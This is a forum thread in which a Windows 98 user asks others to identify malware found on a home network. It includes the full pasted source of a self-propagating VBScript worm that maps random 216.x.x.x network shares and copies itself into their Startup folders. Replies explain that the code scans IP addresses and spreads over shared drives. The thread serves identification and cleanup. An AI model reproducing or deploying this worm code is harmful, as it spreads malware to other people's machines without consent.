• We’re currently investigating an issue related to the forum theme and styling that is impacting page layout and visual formatting. The problem has been identified, and we are actively working on a resolution. There is no impact to user data or functionality, this is strictly a front-end display issue. We’ll post an update once the fix has been deployed. Thanks for your patience while we get this sorted.

Can Anybody Identify These Viruses/Worms/Trojans?

I found these on one of my computers when I was having trouble with my home network (all WIN98 machines):

1. A .exe 160KB file in the Windows\System directory that was executing on boot-up, under the title "Microsoft Diagnostic" in MSCONFIG. The file renames itself when you execute it (i.e. IVQK.exe to ACJKVA.exe), and places itself in the Windows\System directory. The file disables Zonealarm, and who knows what else. I don't know much about the programming language of this bastard, but viewing it in Wordpad it may be C++. One other thing about this file is that I remember getting an error message when shuting it down concerning "ACEBOTMAINTHREAD". Could this be a Quake II bot?

2. A more interesting file was found in the "STARTUP" directory. The file was "_.vbs" and contained a definite worm. Cut/Pasted below:

set t=wscript.createobject("wscript.network")
set f=createobject("scripting.filesystemobject")
on error resume next
randomize
do
do while w=0
if (f.fileexists("c:\windows\startm~1\programs\startup\network.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\network.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\network.exe")) then f.deletefile("c:\windows\startm~1\programs\startup\network.exe")
if (f.fileexists("c:\windows\startm~1\programs\startup\mscfg.exe")) then f.deletefile("c:\windows\startm~1\programs\startup\mscfg.exe")
if (f.fileexists("c:\windows\startm~1\programs\startup\mscfg.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\mscfg.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\a.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\a.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\a24.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\a24.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\little.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\little.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\prince.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\prince.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\MS StartUp Config.exe")) then f.deletefile("c:\windows\startm~1\programs\startup\MS StartUp Config.exe")
if (f.fileexists("c:\windows\startm~1\programs\startup\_a.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\_a.vbs")
if (f.fileexists("c:\windows\startm~1\programs\startup\_b.vbs")) then f.deletefile("c:\windows\startm~1\programs\startup\_b.vbs")

n="\\216."&int(254*rnd+1)&"."&int(254*rnd+1)&"."&int(254*rnd+1)&"\C"
t.mapnetworkdrive "x:",n
set o=t.enumnetworkdrives
for i=0 to o.Count-1
if n=o.item(i) then w=1
next
loop
f.copyfile "c:\windows\startm~1\programs\startup\_.vbs", "x:\windows\startm~1\programs\startup\"
f.copyfile "c:\windows\startm~1\programs\startup\_.exe", "x:\windows\startm~1\programs\startup\"
t.removenetworkdrive "x:"
w=0
loop
'Viva Bin Laden!



Norton Antivirus didn't pick up on either one of these. What in the world is going on? Should I reformat the drive?

If anybody wants to see the former file I can e-mail for examination.

TIA
 


<< n="\\216."&int(254*rnd+1)&"."&int(254*rnd+1)&"."&int(254*rnd+1)&"\C" >>



Im no scripter, but this line looks like it tries random IP's , with the first octet always 216.
It looks like it shares out all your drives as well?

It's definetly a worm of some sort.
 
check out this web site, it has a pretty good description of your worm/trojan

link to trojan identification

This is about as close as you will find to your description. It doesn't look very destructive though. this site will also run a free scan on your box to help clean it up.

 
Back
Top